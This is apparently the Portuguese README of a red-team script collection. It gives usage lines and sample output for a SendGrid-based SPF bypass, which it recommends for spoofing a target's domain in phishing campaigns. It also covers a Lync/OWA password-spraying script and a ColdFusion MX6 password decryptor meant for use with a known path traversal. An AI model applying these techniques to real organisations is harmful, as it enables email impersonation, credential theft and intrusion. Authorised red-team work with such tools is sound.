
Coleção de scripts ofensivos de red team, incluindo encerramento de processos, bypass de SPF para phishing, password spraying e descriptografia de senhas do ColdFusion.
Repositório com vários scripts de Red Team.
Durante um red team, você realiza todo tipo de atividade e tem vários processos em execução que não quer fechar manualmente. O kill.exe é para você. Copie-o em C:\Windows\
e simplesmente chame-o com o nome do processo que deseja encerrar.
>kill mspaint
killing mspaint 16524
killing mspaint 5284
killing mspaint 8568
killing mspaint 32244
killing mspaint 18908
killing mspaint 12600
killing mspaint 37444
killing mspaint 20492
killing mspaint 36092
killing mspaint 3908
killing mspaint 30980
killing mspaint 37252
killing mspaint 27576
Clientes que usam o sendgrid para enviar e-mails precisam adicionar 167.89.0.0/17 ao seu registro SPF para permitir que o sendgrid envie e-mails em seu nome. Isso introduz uma falha de design que pode ser explorada para contornar o SPF.
Como fazer:
Por que funciona? A sub-rede do sendgrid faz parte do SPF do seu alvo, o que significa que o sendgrid é confiável para enviar e-mails em nome dele. Como sua conta usa os servidores do sendgrid, você também faz parte da lista de permissões :)
Isso significa que, do ponto de vista de um Red Team, você pode enviar e-mails ao seu alvo se passando pelo próprio domínio de e-mail dele ou enviar e-mails em nome dele para outra organização.
Essa é uma ótima maneira de dar mais credibilidade à sua campanha de phishing, já que você pode falsificar o domínio deles.
Basta dar uma olhada no registro TXT de DNS deles e procurar pela seguinte sub-rede 167.89.0.0/17. Se ela estiver presente, você está pronto.
Usage: sendgrid-spf-bypass.py apikey source destination subject emailfile
python sendgrid-spf-bypass.py apikey [email protected] [email protected] "Legitimate email" my-email.txt
O parâmetro emailfile deve ser o caminho para um arquivo de texto que contenha seu e-mail. Por enquanto, a ferramenta só suporta mensagens de texto; vou melhorar isso no futuro.
Instale as seguintes dependências
pip install requests_ntlm
pip install requests
$ python password-spray.py
PasswordSpraying v1.0
Usage: %s [user list] [domain] [url] [password]
$ python password-spray.py users.txt RINGZER0 https://lyncweb.ringzer0team.com/abs/ Summer2018
Observe que vários endpoints podem ser usados para validar as credenciais do usuário. O subdomínio do Lync e do OWA on-premise pode ser diferente. Use o recurso de descoberta automática para obter a URL correta para o seu alvo:
Existem várias outras URLs que podem ser usadas para Lync e OWA on-premise.
Algumas pessoas ainda vivem no passado. Em 2018, ainda encontramos ColdFusion MX 6 exposto publicamente. Este script pode ajudar alguém a recuperar a versão em texto simples da senha que pode ser extraída por meio do conhecido path traversal que afetava o ColdFusion.
$ java -jar CFMX6Decryptor.jar
ColdFusion MX6 Password decryptor.
Author Mr.Un1k0d3r & Psychan RingZer0 Team 2014
Usage: DecryptCFPassword [uuencoded password]
Mr.Un1k0d3r RingZer0 Team